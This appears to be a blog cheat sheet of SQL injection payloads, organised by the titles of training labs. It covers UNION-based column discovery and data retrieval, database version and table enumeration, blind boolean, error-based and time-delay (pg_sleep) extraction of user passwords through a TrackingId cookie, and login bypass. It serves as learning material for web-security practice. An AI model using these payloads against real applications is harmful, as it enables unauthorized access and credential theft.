Links
SQL injection UNION attack, determining the number of columns returned by the query '+UNION+SELECT+NULL-- --Keep adding more NULL values, noting unique responses SQL injection UNION attack, finding a column containing text '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses SQL injection UNION attack, retrieving data from other tables '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'-- --Ex: 2 columns containing text '+UNION+SELECT+col_name1,+col_name2+FROM+table_name-- --Retrieve contents from table SQL injection UNION attack, retrieving multiple values in a single column '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses --Retrieving contents of table_name, where col_name1 & col_name2 are columns: '+UNION+SELECT+NULL,col_name1||'~'||col_name2+FROM+table_name-- SQL injection attack, querying the database type and version on Oracle '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'+FROM+DUAL-- --Ex: 2 columns w/ text '+UNION+SELECT+BANNER,+NULL+FROM+v$version-- --Display DB version SQL injection attack, querying the database type and version on MySQL and Microsoft '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'# --Ex: 2 columns w/ text '+UNION+SELECT+@@version,+NULL# --Display DB version SQL injection attack, listing the database contents on non-Oracle databases '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'-- --Ex: 2 columns w/ text --Retrieve the list of tables in the database: '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- SQL injection attack, listing the database contents on Oracle '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'+FROM+DUAL-- --Ex: 2 columns w/ text --Retrieve the list of tables in the database: '+UNION+SELECT+table_name,NULL+FROM+all_tables-- --Retrieve the details of the columns in the table: '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'-- --Retrieving particular columns in a table: '+UNION+SELECT+COL_NAME1,+COL_NAME2+FROM+TABLE_NAME-- Blind SQL injection with conditional responses --Tracking cookie e.g. TrackingId=xyz. Testing boolean conditions to observe response. TrackingId=xyz' AND '1'='1 TrackingId=xyz' AND '1'='2 --Test for existence of a particular table - 'table_name' TrackingId=xyz' AND (SELECT 'a' FROM table_name LIMIT 1)=' --Test for existence of a particular user - 'user_name' TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name')='a --Determine the # of chars. in password of user_name above. If true, char. length > 1 TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>1)='a --Follow-up tests for password length, incrementing 'n' TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>n)='a --Extract a single character from the password, and test it against a specific value. Increment 'n' each cycle. TrackingId=xyz' AND (SELECT SUBSTRING(password,n,1) FROM table_name WHERE col_name='user_name')='a Blind SQL injection with conditional errors --Assume tracking cookie, modify its value, check for response TrackingId=xyz' TrackingId=xyz'' --Confirm that the server is interpreting the injection as a SQL query - valid/invalid? TrackingId=xyz'||(SELECT '')||' --Oracle database? TrackingId=xyz'||(SELECT '' FROM dual)||' --Submitting an invalid query while still preserving valid SQL syntax to verify if injection is being processed as --a SQL query by the back-end if error is returned TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||' --Verifying existence of a particular table - 'table_name'. If no error, likely exists. TrackingId=xyz'||(SELECT '' FROM table_name WHERE ROWNUM = 1)||' --Check for error message, triggering errors conditionally on truth of a condition (1=1) or (1=2) TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' --Check for existence of particular username - 'user_name'. If error arises, likely exists. TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Determine # of chars in user_name discovered above TrackingId=xyz'||(SELECT CASE WHEN length(password)>1 THEN to_char(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Testing password lengths, increment length until error disappears TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Increment 'n' to extract a single character from the password, and test it against a specific value TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,n,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' Blind SQL injection with time delays --Tracking cookie, SQLi TrackingId=x'||pg_sleep(10)-- Blind SQL injection with time delays and information retrieval --App with tracking cookie, testing for time delay TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END-- TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END-- --Testing for particular table and column TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Determining # of chars in col_name (insert_name) TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Increment 'n' to test different password lengths. Correct length is determined once there is no time delay. TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>n)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Testing match for each password char. Start 'n' at 1, increment until password length determined above. TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+substring(password,n,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- SQL injection vulnerability in WHERE clause allowing retrieval of hidden data '+OR+1=1-- SQL injection vulnerability allowing login bypass administrator'-- Comments are closed.
|
AuthorExploring Android and mobile web design, security, and development. Archives
March 2021
Categories |